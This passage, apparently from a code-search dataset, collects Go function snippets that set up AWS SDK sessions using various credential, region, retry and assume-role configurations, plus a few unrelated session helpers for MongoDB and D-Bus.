\"Failed to initiate AWS session\", err)\n\t\treturn nil, err\n\t}\n\treturn sess, nil\n}", "func GetSession(c *Config) (*session.Session, error) {\n\tif c.SkipMetadataApiCheck {\n\t\tos.Setenv(\"AWS_EC2_METADATA_DISABLED\", \"true\")\n\t}\n\n\toptions, err := GetSessionOptions(c)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsess, err := session.NewSessionWithOptions(*options)\n\tif err != nil {\n\t\tif tfawserr.ErrCodeEquals(err, \"NoCredentialProviders\") {\n\t\t\treturn nil, c.NewNoValidCredentialSourcesError(err)\n\t\t}\n\t\treturn nil, fmt.Errorf(\"Error creating AWS session: %w\", err)\n\t}\n\n\tif c.MaxRetries > 0 {\n\t\tsess = sess.Copy(&aws.Config{MaxRetries: aws.Int(c.MaxRetries)})\n\t}\n\n\t// AWS SDK Go automatically adds a User-Agent product to HTTP requests,\n\t// which contains helpful information about the SDK version and runtime.\n\t// The configuration of additional User-Agent header products should take\n\t// precedence over that product. Since the AWS SDK Go request package\n\t// functions only append, we must PushFront on the build handlers instead\n\t// of PushBack. To properly keep the order given by the configuration, we\n\t// must reverse iterate through the products so the last item is PushFront\n\t// first through the first item being PushFront last.\n\tfor i := len(c.UserAgentProducts) - 1; i >= 0; i-- {\n\t\tproduct := c.UserAgentProducts[i]\n\t\tsess.Handlers.Build.PushFront(request.MakeAddToUserAgentHandler(product.Name, product.Version, product.Extra...))\n\t}\n\n\t// Add custom input from ENV to the User-Agent request header\n\t// Reference: https://github.com/terraform-providers/terraform-provider-aws/issues/9149\n\tif v := os.Getenv(AppendUserAgentEnvVar); v != \"\" {\n\t\tlog.Printf(\"[DEBUG] Using additional User-Agent Info: %s\", v)\n\t\tsess.Handlers.Build.PushBack(request.MakeAddToUserAgentFreeFormHandler(v))\n\t}\n\n\t// Generally, we want to configure a lower retry theshold for networking issues\n\t// as the session retry threshold is very high by default and can mask permanent\n\t// networking failures, such as a non-existent service endpoint.\n\t// MaxRetries will override this logic if it has a lower retry threshold.\n\t// NOTE: This logic can be fooled by other request errors raising the retry count\n\t// before any networking error occurs\n\tsess.Handlers.Retry.PushBack(func(r *request.Request) {\n\t\tif r.RetryCount < MaxNetworkRetryCount {\n\t\t\treturn\n\t\t}\n\t\t// RequestError: send request failed\n\t\t// caused by: Post https://FQDN/: dial tcp: lookup FQDN: no such host\n\t\tif tfawserr.ErrMessageAndOrigErrContain(r.Error, \"RequestError\", \"send request failed\", \"no such host\") {\n\t\t\tlog.Printf(\"[WARN] Disabling retries after next request due to networking issue\")\n\t\t\tr.Retryable = aws.Bool(false)\n\t\t}\n\t\t// RequestError: send request failed\n\t\t// caused by: Post https://FQDN/: dial tcp IPADDRESS:443: connect: connection refused\n\t\tif tfawserr.ErrMessageAndOrigErrContain(r.Error, \"RequestError\", \"send request failed\", \"connection refused\") {\n\t\t\tlog.Printf(\"[WARN] Disabling retries after next request due to networking issue\")\n\t\t\tr.Retryable = aws.Bool(false)\n\t\t}\n\t})\n\n\tif !c.SkipCredsValidation {\n\t\tif _, _, err := GetAccountIDAndPartitionFromSTSGetCallerIdentity(sts.New(sess)); err != nil {\n\t\t\treturn nil, fmt.Errorf(\"error validating provider credentials: %w\", err)\n\t\t}\n\t}\n\n\treturn sess, nil\n}", "func (s *S3) getSession() (*session.Session, error) {\n\tif s.session == nil {\n\t\tcfg := aws.Config{\n\t\t\tCredentials: credentials.NewStaticCredentials(\n\t\t\t\tviper.GetString(\"s3.id\"),\n\t\t\t\tviper.GetString(\"s3.secret\"),\n\t\t\t\t\"\",\n\t\t\t),\n\t\t\tRegion: aws.String(viper.GetString(\"s3.region\")),\n\t\t}\n\n\t\tsession, err := session.NewSessionWithOptions(session.Options{Config: cfg})\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ts.session = session\n\t}\n\n\treturn s.session, nil\n}", "func (CcsAwsSession *ccsAwsSession) GetAWSSessions() error {\n\tvar err error\n\n\tCcsAwsSession.once.Do(func() {\n\t\tawsProfile := viper.GetString(config.AWSProfile)\n\t\tawsAccessKey := viper.GetString(config.AWSAccessKey)\n\t\tawsSecretAccessKey := viper.GetString(config.AWSSecretAccessKey)\n\n\t\toptions := session.Options{\n\t\t\tConfig: aws.Config{\n\t\t\t\tRegion: aws.String(viper.GetString(config.AWSRegion)),\n\t\t\t},\n\t\t}\n\n\t\tif awsProfile != \"\" {\n\t\t\toptions.Profile = awsProfile\n\t\t} else if awsAccessKey != \"\" || awsSecretAccessKey != \"\" {\n\t\t\toptions.Config.Credentials = credentials.NewStaticCredentials(awsAccessKey, awsSecretAccessKey, \"\")\n\t\t}\n\n\t\tCcsAwsSession.session, err = session.NewSessionWithOptions(options)\n\t\tCcsAwsSession.iam = iam.New(CcsAwsSession.session)\n\t\tCcsAwsSession.ec2 = ec2.New(CcsAwsSession.session)\n\t\tCcsAwsSession.accountId = viper.GetString(config.AWSAccountId)\n\t})\n\tif err != nil {\n\t\tlog.Printf(\"error initializing AWS session: %v\", err)\n\t}\n\n\treturn nil\n}", "func getSession(profile string) *session.Session {\n\tvar options session.Options\n\n\toptions = session.Options{\n\t\t// We pass a custom token provider here\n\t\t// to ensure we can stop the printer while we wait for\n\t\t// the mfa token\n\t\tAssumeRoleTokenProvider: mfaTokenProvider,\n\n\t\tConfig: aws.Config{\n\t\t\tCredentialsChainVerboseErrors: aws.Bool(true),\n\t\t},\n\t}\n\n\tif len(profile) > 0 {\n\t\toptions.Profile = profile\n\t\toptions.SharedConfigState = session.SharedConfigEnable\n\t}\n\tawsSession := must(session.NewSessionWithOptions(options))\n\n\treturn awsSession\n}", "func createSession(accessKeyId string, secretAccessKey string, profileName string) *session.Session {\n return session.Must(session.NewSessionWithOptions(session.Options{\n Config: aws.Config{\n Region: aws.String(\"eu-west-1\"),\n Credentials: credentials.NewStaticCredentials(accessKeyId, secretAccessKey, \"\"),\n },\n Profile: profileName,\n }))\n}", "func (*SDKGetter) Session(clusterConfig *v1alpha1.AWSClusterProviderConfig) *session.Session {\n\treturn session.Must(session.NewSession(aws.NewConfig().WithRegion(clusterConfig.Region)))\n}", "func New(profile string) (*session.Session, error) {\n\n\t// grab credentials from env vars first\n\t// then use the config file\n\tcreds := credentials.NewChainCredentials(\n\t\t[]credentials.Provider{\n\t\t\t&credentials.EnvProvider{},\n\t\t\t&credentials.SharedCredentialsProvider{\n\t\t\t\tProfile: profile,\n\t\t\t},\n\t\t},\n\t)\n\n\t// get creds\n\t_, err := creds.Get()\n\n\t// create a session with creds we've used\n\tsess, err := session.NewSession(&aws.Config{\n\t\tCredentials: creds,\n\t})\n\n\tif err != nil {\n\t\treturn sess, err\n\t}\n\n\treturn sess, nil\n\n}", "func NewSession() (*session.Session, error) {\n\tvar cfg config\n\tif err := envconfig.Process(\"\", &cfg); err != nil {\n\t\treturn nil, err\n\t}\n\treturn session.NewSession(&aws.Config{Region: aws.String(cfg.Region)})\n}", "func createAWSSession(c *config.Config) *session.Session {\n\tconf := aws.NewConfig().WithRegion(c.Region)\n\tif c.Profile != \"\" {\n\t\tconf = conf.WithCredentials(\n\t\t\tcredentials.NewSharedCredentials(\"\", c.Profile),\n\t\t)\n\t}\n\treturn session.New(conf)\n}", "func AWSSessions(region string) *session.Session {\n\tconf := aws.Config{\n\t\tRegion: aws.String(region),\n\t}\n\tsess := session.Must(session.NewSession(&conf))\n\treturn sess\n}", "func (c *AccessConfig) Session() (*session.Session, error) {\n\tif c.session != nil {\n\t\treturn c.session, nil\n\t}\n\n\t// build a chain provider, lazy-evaluated by aws-sdk\n\tproviders := []credentials.Provider{\n\t\t&credentials.StaticProvider{Value: credentials.Value{\n\t\t\tAccessKeyID: c.AccessKey,\n\t\t\tSecretAccessKey: c.SecretKey,\n\t\t\tSessionToken: c.Token,\n\t\t}},\n\t\t&credentials.EnvProvider{},\n\t\t&credentials.SharedCredentialsProvider{\n\t\t\tFilename: \"\",\n\t\t\tProfile: c.ProfileName,\n\t\t},\n\t}\n\n\t// Build isolated HTTP client to avoid issues with globally-shared settings\n\tclient := cleanhttp.DefaultClient()\n\n\t// Keep the default timeout (100ms) low as we don't want to wait in non-EC2 environments\n\tclient.Timeout = 100 * time.Millisecond\n\n\tconst userTimeoutEnvVar = \"AWS_METADATA_TIMEOUT\"\n\tuserTimeout := os.Getenv(userTimeoutEnvVar)\n\tif userTimeout != \"\" {\n\t\tnewTimeout, err := time.ParseDuration(userTimeout)\n\t\tif err == nil {\n\t\t\tif newTimeout.Nanoseconds() > 0 {\n\t\t\t\tclient.Timeout = newTimeout\n\t\t\t} else {\n\t\t\t\tlog.Printf(\"[WARN] Non-positive value of %s (%s) is meaningless, ignoring\", userTimeoutEnvVar, newTimeout.String())\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Printf(\"[WARN] Error converting %s to time.Duration: %s\", userTimeoutEnvVar, err)\n\t\t}\n\t}\n\n\tlog.Printf(\"[INFO] Setting AWS metadata API timeout to %s\", client.Timeout.String())\n\tcfg := &aws.Config{\n\t\tHTTPClient: client,\n\t}\n\tif !c.SkipMetadataApiCheck {\n\t\t// Real AWS should reply to a simple metadata request.\n\t\t// We check it actually does to ensure something else didn't just\n\t\t// happen to be listening on the same IP:Port\n\t\tmetadataClient := ec2metadata.New(session.New(cfg))\n\t\tif metadataClient.Available() {\n\t\t\tproviders = append(providers, &ec2rolecreds.EC2RoleProvider{\n\t\t\t\tClient: metadataClient,\n\t\t\t})\n\t\t\tlog.Print(\"[INFO] AWS EC2 instance detected via default metadata\" +\n\t\t\t\t\" API endpoint, EC2RoleProvider added to the auth chain\")\n\t\t} else {\n\t\t\tlog.Printf(\"[INFO] Ignoring AWS metadata API endpoint \" +\n\t\t\t\t\"as it doesn't return any instance-id\")\n\t\t}\n\t}\n\n\tcreds := credentials.NewChainCredentials(providers)\n\tcp, err := creds.Get()\n\tif err != nil {\n\t\tif awsErr, ok := err.(awserr.Error); ok && awsErr.Code() == \"NoCredentialProviders\" {\n\t\t\treturn nil, errors.New(\"No valid credential sources found for AWS Builder. \" +\n\t\t\t\t\"Please see https://www.packer.io/docs/builders/amazon.html#specifying-amazon-credentials \" +\n\t\t\t\t\"for more information on providing credentials for the AWS Builder.\")\n\t\t}\n\n\t\treturn nil, fmt.Errorf(\"Error loading credentials for AWS Provider: %s\", err)\n\t}\n\tlog.Printf(\"[INFO] AWS Auth provider used: %q\", cp.ProviderName)\n\n\tconfig := aws.NewConfig().WithMaxRetries(11).WithCredentialsChainVerboseErrors(true)\n\tconfig = config.WithCredentials(creds)\n\n\tif c.RawRegion != \"\" {\n\t\tconfig = config.WithRegion(c.RawRegion)\n\t} else if region := c.metadataRegion(); region != \"\" {\n\t\tconfig = config.WithRegion(region)\n\t}\n\n\tif c.CustomEndpointEc2 != \"\" {\n\t\tconfig = config.WithEndpoint(c.CustomEndpointEc2)\n\t}\n\n\topts := session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t\tConfig: *config,\n\t}\n\n\tif c.MFACode != \"\" {\n\t\topts.AssumeRoleTokenProvider = func() (string, error) {\n\t\t\treturn c.MFACode, nil\n\t\t}\n\t}\n\n\tif sess, err := session.NewSessionWithOptions(opts); err != nil {\n\t\treturn nil, err\n\t} else if *sess.Config.Region == \"\" {\n\t\treturn nil, fmt.Errorf(\"Could not find AWS region, make sure it's set.\")\n\t} else {\n\t\tlog.Printf(\"Found region %s\", *sess.Config.Region)\n\t\tc.session = sess\n\t}\n\n\treturn c.session, nil\n}", "func GetSessionOptions(c *Config) (*session.Options, error) {\n\toptions := &session.Options{\n\t\tConfig: aws.Config{\n\t\t\tEndpointResolver: c.EndpointResolver(),\n\t\t\tHTTPClient: cleanhttp.DefaultClient(),\n\t\t\tMaxRetries: aws.Int(0),\n\t\t\tRegion: aws.String(c.Region),\n\t\t},\n\t\tProfile: c.Profile,\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t}\n\n\t// get and validate credentials\n\tcreds, err := GetCredentials(c)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// add the validated credentials to the session options\n\toptions.Config.Credentials = creds\n\n\tif c.Insecure {\n\t\ttransport := options.Config.HTTPClient.Transport.(*http.Transport)\n\t\ttransport.TLSClientConfig = &tls.Config{\n\t\t\tInsecureSkipVerify: true,\n\t\t}\n\t}\n\n\tif c.DebugLogging {\n\t\toptions.Config.LogLevel = aws.LogLevel(aws.LogDebugWithHTTPBody | aws.LogDebugWithRequestRetries | aws.LogDebugWithRequestErrors)\n\t\toptions.Config.Logger = DebugLogger{}\n\t}\n\n\treturn options, nil\n}", "func NewAWSSession(region string) *session.Session {\n\treturn session.Must(session.NewSessionWithOptions(session.Options{\n\t\tConfig: aws.Config{\n\t\t\tRegion: aws.String(region),\n\t\t},\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t}))\n}", "func NewSession(awsProfile string) (*session.Session, error) {\n\tsess, err := session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t\tProfile: awsProfile,\n\t})\n\n\treturn sess, err\n}", "func (inst *Instance) createSession(region string) (*session.Session, error) {\n\tvar creds *credentials.Credentials\n\n\tif inst.cfg.AWS.Role != \"\" {\n\t\tcreds = credentials.NewSharedCredentials(\n\t\t\tinst.cfg.AWS.CredentialsFile,\n\t\t\tinst.cfg.AWS.Role)\n\t} else if inst.cfg.AWS.AccessKeyID != \"\" {\n\t\tcreds = credentials.NewStaticCredentials(\n\t\t\tinst.cfg.AWS.AccessKeyID,\n\t\t\tinst.cfg.AWS.SecretAccessKey,\n\t\t\t\"\")\n\t} else {\n\t\treturn nil, errors.New(\"invalid AWS credentils configuration\")\n\t}\n\n\tcfg := &aws.Config{Credentials: creds}\n\tif region != \"\" && region != \"global\" {\n\t\tcfg.Region = aws.String(region)\n\t}\n\n\treturn session.NewSession(cfg)\n}", "func newAWSSession(accessKeyID, secretAccessKey, region, asssumeRoleArn string) (*session.Session, error) {\n\tvar awsConf *aws.Config\n\tif secretAccessKey != \"\" && accessKeyID != \"\" {\n\t\tcreds := credentials.NewStaticCredentials(accessKeyID, secretAccessKey, \"\")\n\t\tawsConf = &aws.Config{Credentials: creds, Region: &region}\n\t} else {\n\t\tawsConf = &aws.Config{Region: &region}\n\t}\n\n\t// Optional: Assuming role\n\tif asssumeRoleArn != \"\" {\n\t\tstaticsess, err := session.NewSession(&aws.Config{Credentials: awsConf.Credentials})\n\t\tif err != nil {\n\t\t\treturn nil, status.Errorf(codes.Internal, \"failed to create new session: %v\", err)\n\t\t}\n\n\t\tawsConf.Credentials = credentials.NewCredentials(&stscreds.AssumeRoleProvider{\n\t\t\tClient: sts.New(staticsess),\n\t\t\tRoleARN: asssumeRoleArn,\n\t\t\tDuration: 15 * time.Minute,\n\t\t})\n\t}\n\n\treturn session.NewSession(awsConf)\n}", "func Session() (*ec2.EC2, error) {\n\tsess, c, err := common.AWSSession()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn ec2.New(sess, c), nil\n}", "func (creds AwsCredentials) Session() *session.Session {\n\n\tif creds.UseRole {\n\t\t// Get an AWS session from an implicit source if no explicit\n\t\t// configuration is provided. This is useful for taking advantage of\n\t\t// EC2/ECS instance roles.\n\t\tsess := session.Must(session.NewSession())\n\t\tif creds.Region != \"\" {\n\t\t\tsess.Config.WithRegion(creds.Region)\n\t\t}\n\n\t\treturn sess\n\t}\n\n\treturn session.Must(session.NewSession(\n\t\t&aws.Config{\n\t\t\tRegion: aws.String(creds.Region),\n\t\t\tCredentials: credentials.NewStaticCredentials(creds.AccessKeyID, creds.SecretAccessKey, \"\"),\n\t\t}))\n}", "func NewSession(region string) *session.Session {\n\tsess := session.Must(session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t\tConfig: aws.Config{\n\t\t\tRegion: aws.String(region),\n\t\t},\n\t}))\n\n\treturn sess\n}", "func NewAWSSession(t *testing.T, region string) (sess *session.Session, rt http.RoundTripper, done func()) {\n\tmode := recorder.ModeReplaying\n\tif *Record {\n\t\tmode = recorder.ModeRecording\n\t}\n\tawsMatcher := &replay.ProviderMatcher{\n\t\tURLScrubbers: []*regexp.Regexp{\n\t\t\tregexp.MustCompile(`X-Amz-(Credential|Signature)=[^?]*`),\n\t\t},\n\t\tHeaders: []string{\"X-Amz-Target\"},\n\t}\n\tr, done, err := replay.NewRecorder(t, mode, awsMatcher, t.Name())\n\tif err != nil {\n\t\tt.Fatalf(\"unable to initialize recorder: %v\", err)\n\t}\n\n\tclient := &http.Client{Transport: r}\n\n\t// Provide fake creds if running in replay mode.\n\tvar creds *awscreds.Credentials\n\tif !*Record {\n\t\tcreds = awscreds.NewStaticCredentials(\"FAKE_ID\", \"FAKE_SECRET\", \"FAKE_TOKEN\")\n\t}\n\n\tsess, err = session.NewSession(&aws.Config{\n\t\tHTTPClient: client,\n\t\tRegion: aws.String(region),\n\t\tCredentials: creds,\n\t\tMaxRetries: aws.Int(0),\n\t})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\treturn sess, r, done\n}", "func NewSession(key, secret, region, bucket string) Client {\n\tlog.Printf(\"Creating new session with key id %s in region %s\", key, region)\n\tsess := session.Must(session.NewSession(&aws.Config{\n\t\tCredentials: credentials.NewStaticCredentials(key, secret, \"\"),\n\t\tRegion: aws.String(region),\n\t}))\n\n\treturn Client{\n\t\tService: s3.New(sess),\n\t\tBucket: bucket,\n\t}\n}", "func (c *BaseAwsClient) GetSessionDuration() (int64, error) {\n\treturn c.getSessionDuration()\n}", "func Ec2Session() (awsSession *session.Session, err error) {\n\tawsSession, err = session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t})\n\n\treturn awsSession, err\n}", "func (client *S3Upload) GetSession() *session.Session {\n\tif client.session == nil {\n\t\tvar err error\n\t\tclient.session, err = GetS3Session(client.AWSRegion,\n\t\t\tclient.accessKeyId, client.secretAccessKey)\n\t\tif err != nil {\n\t\t\tclient.ErrorMessage = err.Error()\n\t\t}\n\t}\n\treturn client.session\n}", "func newSession(roleARN, region string, qps int, burst int) *session.Session {\n\tsess := session.Must(session.NewSession())\n\tsess.Handlers.Build.PushFrontNamed(request.NamedHandler{\n\t\tName: \"authenticatorUserAgent\",\n\t\tFn: request.MakeAddToUserAgentHandler(\n\t\t\t\"aws-iam-authenticator\", pkg.Version),\n\t})\n\tif aws.StringValue(sess.Config.Region) == \"\" {\n\t\tsess.Config.Region = aws.String(region)\n\t}\n\n\tif roleARN != \"\" {\n\t\tlogrus.WithFields(logrus.Fields{\n\t\t\t\"roleARN\": roleARN,\n\t\t}).Infof(\"Using assumed role for EC2 API\")\n\n\t\trateLimitedClient, err := httputil.NewRateLimitedClient(qps, burst)\n\n\t\tif err != nil {\n\t\t\tlogrus.Errorf(\"Getting error = %s while creating rate limited client \", err)\n\t\t}\n\n\t\tap := &stscreds.AssumeRoleProvider{\n\t\t\tClient: sts.New(sess, aws.NewConfig().WithHTTPClient(rateLimitedClient).WithSTSRegionalEndpoint(endpoints.RegionalSTSEndpoint)),\n\t\t\tRoleARN: roleARN,\n\t\t\tDuration: time.Duration(60) * time.Minute,\n\t\t}\n\n\t\tsess.Config.Credentials = credentials.NewCredentials(ap)\n\t}\n\treturn sess\n}", "func getAWSClient(ctx context.Context, conf *config.Config, sess *session.Session, region config.Region) (*cziAWS.Client, error) {\n\t// for things meant to be run as a user\n\tuserConf := &aws.Config{\n\t\tRegion: aws.String(region.AWSRegion),\n\t}\n\n\tlambdaConf := userConf\n\tif conf.LambdaConfig.RoleARN != nil {\n\t\t// for things meant to be run as an assumed role\n\t\tlambdaConf = &aws.Config{\n\t\t\tRegion: aws.String(region.AWSRegion),\n\t\t\tCredentials: stscreds.NewCredentials(\n\t\t\t\tsess,\n\t\t\t\t*conf.LambdaConfig.RoleARN, func(p *stscreds.AssumeRoleProvider) {\n\t\t\t\t\tp.TokenProvider = stscreds.StdinTokenProvider\n\t\t\t\t},\n\t\t\t),\n\t\t}\n\t}\n\tawsClient := cziAWS.New(sess).\n\t\tWithIAM(userConf).\n\t\tWithKMS(userConf).\n\t\tWithSTS(userConf).\n\t\tWithLambda(lambdaConf)\n\treturn awsClient, nil\n}", "func getSession(ctx context.Context) *session.Session {\n\treturn ctx.Value(sessKey{}).(*session.Session)\n}", "func getSession(config Config) (*mgo.Session, error) {\n\tinfo := mgo.DialInfo{\n\t\tAddrs: []string{config.Host},\n\t\tTimeout: 60 * time.Second,\n\t\tDatabase: config.AuthDB,\n\t\tUsername: config.User,\n\t\tPassword: config.Password,\n\t}\n\n\t// Create a session which maintains a pool of socket connections\n\t// to our MongoDB.\n\tses, err := mgo.DialWithInfo(&info)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tses.SetMode(mgo.Monotonic, true)\n\n\treturn ses, nil\n}", "func NewAWSSession() (*session.Session, error) {\n\treturn session.NewSession()\n}", "func InitAWS(awsRegion, awsAccessKey, awsSecretKey string) {\n\n\tAWSSession = session.New()\n\n\t// Region\n\tif awsRegion != \"\" {\n\t\t// CLI trumps\n\t\tAWSSession.Config.Region = aws.String(awsRegion)\n\t} else if os.Getenv(\"AWS_DEFAULT_REGION\") != \"\" {\n\t\t// Env is good, too\n\t\tAWSSession.Config.Region = aws.String(os.Getenv(\"AWS_DEFAULT_REGION\"))\n\t} else {\n\t\t// Grab it from this EC2 instance, maybe\n\t\tregion, err := getAwsRegionE()\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Cannot set AWS region: '%v'\\n\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\t\tAWSSession.Config.Region = aws.String(region)\n\t}\n\n\t// Creds\n\tif awsAccessKey != \"\" && awsSecretKey != \"\" {\n\t\t// CLI trumps\n\t\tcreds := credentials.NewStaticCredentials(\n\t\t\tawsAccessKey,\n\t\t\tawsSecretKey,\n\t\t\t\"\")\n\t\tAWSSession.Config.Credentials = creds\n\t} else if os.Getenv(\"AWS_ACCESS_KEY_ID\") != \"\" {\n\t\t// Env is good, too\n\t\tcreds := credentials.NewStaticCredentials(\n\t\t\tos.Getenv(\"AWS_ACCESS_KEY_ID\"),\n\t\t\tos.Getenv(\"AWS_SECRET_ACCESS_KEY\"),\n\t\t\t\"\")\n\t\tAWSSession.Config.Credentials = creds\n\t}\n\n}", "func newSession(c Config) (*session.Session, error) {\n\t//sets credentials\n\tcreds := credentials.NewStaticCredentials(c.Key, c.Secret, \"\")\n\t_, err := creds.Get()\n\tif err != nil {\n\t\treturn nil, ErrInvalidCreds.Context(err)\n\t}\n\n\tr := &retryer{retryCount: c.RetryCount}\n\n\tcfg := request.WithRetryer(aws.NewConfig().WithRegion(c.Region).WithCredentials(creds), r)\n\n\t//if an optional hostname config is provided, then replace the default one\n\t//\n\t// This will set the default AWS URL to a hostname of your choice. Perfect for testing, or mocking functionality\n\tif c.Hostname != \"\" {\n\t\tcfg.Endpoint = &c.Hostname\n\t}\n\n\treturn session.NewSession(cfg)\n}", "func NewSession(name string) *session.Session {\n\tregion := os.Getenv(\"AWS_REGION\")\n\tif region == \"\" {\n\t\tregion = \"eu-west-1\"\n\t}\n\n\tif name == \"\" {\n\t\treturn session.New(&aws.Config{Region: aws.String(region)})\n\t}\n\treturn session.New(&aws.Config{\n\t\tRegion: aws.String(region),\n\t\tCredentials: credentials.NewSharedCredentials(\"\", name),\n\t})\n}", "func GetSession(conn *dbus.Conn, path dbus.ObjectPath) (Session, error) {\n\tobj := conn.Object(SecretServiceDest, dbus.ObjectPath(path))\n\n\treturn &session{\n\t\tpath: path,\n\t\tobj: obj,\n\t}, nil\n}", "func NewSession() *session.Session {\n\tmuCredentials.Lock()\n\tdefer muCredentials.Unlock()\n\n\tawsConfig := aws.\n\t\tNewConfig().\n\t\tWithCredentials(credentials.NewStaticCredentialsFromCreds(pythonCredentialsValue))\n\treturn spartaAWS.NewSessionWithConfig(awsConfig, cgoLambdaHTTPAdapter.logger)\n}", "func createSession(bucket string, settings map[string]string) (*session.Session, error) {\n\tconfig := getDefaultConfig(settings)\n\tconfig.MaxRetries = &MaxRetries\n\tif _, err := config.Credentials.Get(); err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed to get AWS credentials; please specify %s and %s\", AccessKeyIdSetting, SecretAccessKeySetting)\n\t}\n\n\tif endpoint, ok := settings[EndpointSetting]; ok {\n\t\tconfig.Endpoint = aws.String(endpoint)\n\t}\n\n\tif s3ForcePathStyleStr, ok := settings[ForcePathStyleSetting]; ok {\n\t\ts3ForcePathStyle, err := strconv.ParseBool(s3ForcePathStyleStr)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrapf(err, \"failed to parse %s\", ForcePathStyleSetting)\n\t\t}\n\t\tconfig.S3ForcePathStyle = aws.Bool(s3ForcePathStyle)\n\t}\n\n\tregion, err := getAWSRegion(bucket, config, settings)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tconfig = config.WithRegion(region)\n\n\tfilePath := settings[s3CertFile]\n\tif filePath != \"\" {\n\t\tif file, err := os.Open(filePath); err == nil {\n\t\t\tdefer file.Close()\n\t\t\treturn session.NewSessionWithOptions(session.Options{Config: *config, CustomCABundle: file})\n\t\t} else {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn session.NewSession(config)\n}", "func NewSessionWithConfig(cfg *aws.Config) (*session.Session, error) {\n\treturn session.NewSession(cfg)\n}", "func (sm S3Manager) Session() (*s3.S3, error) {\n\tsess := session.Must(session.NewSessionWithOptions(session.Options{\n\t\tConfig: aws.Config{Region: aws.String(sm.AWSRegion)},\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t\tProfile: sm.AWSProfile,\n\t}))\n\n\t// validation for target account id\n\tif sm.TargetAccountId != \"\" {\n\t\taID, err := sm.AWSSessionAccountID(sess)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Error requesting AWS caller identity: %v\", err.Error())\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif aID != sm.TargetAccountId {\n\t\t\treturn nil, fmt.Errorf(\n\t\t\t\t\"[S3] Target account id (%v) did not match with account id (%v) in the current AWS session\",\n\t\t\t\tsm.TargetAccountId,\n\t\t\t\taID,\n\t\t\t)\n\t\t}\n\t}\n\n\tif sm.NukeRoleARN == \"\" {\n\t\t// this means, we are using given aws profile\n\t\treturn s3.New(sess), nil\n\t}\n\n\t// Create the credentials from AssumeRoleProvider if nuke role arn is provided\n\tcreds := stscreds.NewCredentials(sess, sm.NukeRoleARN)\n\t// Create service client value configured for credentials from assumed role\n\treturn s3.New(sess, &aws.Config{Credentials: creds, MaxRetries: &AWS_SDK_MAX_RETRY}), nil\n}", "func GetAwsCredentialsFromEnv(targetEnv string) (AwsCredentials, error) {\n\tvar creds AwsCredentials\n\n\tcreds.Region = strings.TrimSpace(GetTargetEnv(targetEnv, \"AWS_DEFAULT_REGION\"))\n\n\tif v := GetTargetEnv(targetEnv, \"AWS_USE_ROLE\"); v != \"\" {\n\t\tcreds.UseRole, _ = strconv.ParseBool(v)\n\n\t\tsess, err := session.NewSession()\n\t\tif err != nil {\n\t\t\treturn creds, errors.Wrap(err, \"Failed to load AWS credentials from instance\")\n\t\t}\n\n\t\tif sess.Config != nil && sess.Config.Region != nil && *sess.Config.Region != \"\" {\n\t\t\tcreds.Region = *sess.Config.Region\n\t\t} else {\n\t\t\tsm := ec2metadata.New(sess)\n\t\t\tcreds.Region, err = sm.Region()\n\t\t\tif err != nil {\n\t\t\t\treturn creds, errors.Wrap(err, \"Failed to get region from AWS session\")\n\t\t\t}\n\t\t}\n\n\t\treturn creds, nil\n\t}\n\n\tcreds.AccessKeyID = strings.TrimSpace(GetTargetEnv(targetEnv, \"AWS_ACCESS_KEY_ID\"))\n\tcreds.SecretAccessKey = strings.TrimSpace(GetTargetEnv(targetEnv, \"AWS_SECRET_ACCESS_KEY\"))\n\n\terrs := validator.New().Struct(creds)\n\tif errs != nil {\n\t\treturn creds, errs\n\t}\n\n\t//os.Setenv(\"AWS_DEFAULT_REGION\", creds.Region)\n\n\treturn creds, nil\n}", "func GetSession(ctx context.Context) session.Session {\n\ts, ok := ctx.Value(sessionCtx).(session.Session)\n\tif !ok {\n\t\tpanic(\"context does not have an edgegrid session\")\n\t}\n\n\treturn s\n}", "func (cc *ClusterController) getSessionInfo(session *session, clientAddress uint64) *dataformat.Session {\n\tnumServers := cc.metric.MetricNumServers.calc(session)\n\tnumFlows := cc.metric.MetricNumFlows.calc(session)\n\tinterFlowTimes := cc.metric.MetricInterFlowTimes.calc(session)\n\tinterFlowTimesMean, interFlowTimesMin, interFlowTimesMax, interFlowTimesStdDev := utils.GetDistributionStats(interFlowTimes)\n\tsessionInfo := &dataformat.Session{\n\t\tClientAddress: clientAddress,\n\t\tNumServers: int64(numServers),\n\t\tNumFlows: int64(numFlows),\n\t\tInterFlow: &dataformat.Distribution{Mean: interFlowTimesMean,\n\t\t\tMin: int64(interFlowTimesMin),\n\t\t\tMax: int64(interFlowTimesMax),\n\t\t\tStdDev: interFlowTimesStdDev,\n\t\t},\n\t}\n\treturn sessionInfo\n}", "func setup() *session.Session {\n\n\tif sess == nil {\n\n\t\t// server is the mock server that simply writes a 200 status back to the client\n\t\tserver := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t\tw.WriteHeader(http.StatusOK)\n\t\t}))\n\n\t\treturn session.Must(session.NewSession(&aws.Config{\n\t\t\tDisableSSL: aws.Bool(true),\n\t\t\tEndpoint: aws.String(server.URL),\n\t\t\tCredentials: credentials.NewStaticCredentials(\"AKID\", \"SECRET\", \"SESSION\"),\n\t\t\tRegion: 